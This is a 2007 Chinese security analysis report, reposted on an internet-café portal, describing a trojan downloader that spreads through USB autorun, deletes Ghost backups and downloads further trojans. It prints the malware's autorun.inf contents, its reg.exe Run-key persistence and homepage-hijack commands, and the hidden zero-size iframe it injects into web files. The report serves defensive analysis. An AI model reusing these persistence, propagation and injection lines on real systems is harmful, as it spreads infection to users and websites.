用户名:  密码:  验证码: 验证码图片.

[看不到图片?点击刷新验证码。] 线路: 网通 电信

首  页网吧论坛新闻中心技术资料周边产品资源下载网吧博客网吧建站供求信息网吧人才网吧电台网吧图库
政策法规地方新闻业界会务网游资讯经营管理连锁网吧业界访谈网管心声时事热点网络追踪市场观望产品导购
游戏更新天下评测组网建设网吧系统软件应用网络安全解决方案媒体应用无盘资料技术讨论网吧杂谈网吧杂志
软件应用|组网架设|网吧系统|网络安全|流媒体应用|无盘技术|解决方案|Linux专版|游戏服务器
您现在的位置:首页 >> 技术资料 >> 网络安全 >> 正文
分析报告:下载者生成器生成的网页木马
李铁军   2007年06月26日   赛迪网

  这年头,做个守法公民真不容易,昨天有个曾经做过“黑客”的朋友做的网站被DDoS了,他打算重操旧业。为非作歹的程序员也层出不穷,下面这个是昨天那个牛×下载者生成器生成的网马分析报告。那个下载器本身毒霸也可以杀。

  又到大学生找工作的时候了,不晓得会有多少学生因就业问题,走到病毒开发者的队伍中去。

  这是一个木马下载病毒,该病毒会删除被感染机器上的ghost备份文件,并且尝试感染脚本文件,尝试通过U盘传播把病毒本身传播出去。链接指定网址,下载其他木马程序。

  1.%system%\SVSH0ST.EXE
%system%\Autorun.inf

  1.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe,并且创建autorun.inf文件,内容如下:

  [AutoRun]

  open=lcg.exe
shell\open=打开(&O)
shell\open\Command=lcg.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=lcg.EXE

  2.创建互斥量"niux"

  3.运行创建进程运行下面的命令:

  reg.exe
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D "
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D
C:\\WINNT\\System32\\SVSH0ST.EXE /F"
"add \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /v \"Start Page\" /t
REG_EXPAND_SZ /d /f"
"add \"HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\" /v
\"HomePage\" /t REG_DWORD /d 00000001 /f"

  4.枚举所有当前窗口,如果发现窗口信息中含有以下字符,就关闭该窗口:

  "病毒"

  5.遍历所有的盘符,如果文件后缀名为.GHO文件(ghost备份文件),则删除该文件,如果文件名中含有以下的

  INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP

  之一的责尝试在文件末尾插入代码:

  <iframe src=http://*/test.htm width=0 height=0>< / iframe >

发表评论     查看评论
验证码: 验证码图片[点击可更换图片]  
* 请各位网友遵纪守法并注意语言文明。
* 已登陆的会员才能发表评论。
*《互联网电子公告服务管理规定》
*《全国人大常委会关于维护互联网安全的规定》
  快捷通道
 
 
 
  举报
 
 
 
 
  推荐阅读
  热门文章
  百度主题推广
   

 
网站帮助 | 关于天下 | 商务合作 | 广告投放 | 投稿指南 | 联系方式 | 友情链接 | 版权声明 | 免责条款 | 隐私保护
新 宽 联 数 码] 中国网吧增值业务领头羊
新宽联数码 2000 - 2006 建设 - 维护 - 版权所有 粤B2-20040365号
广州网监-报警岗亭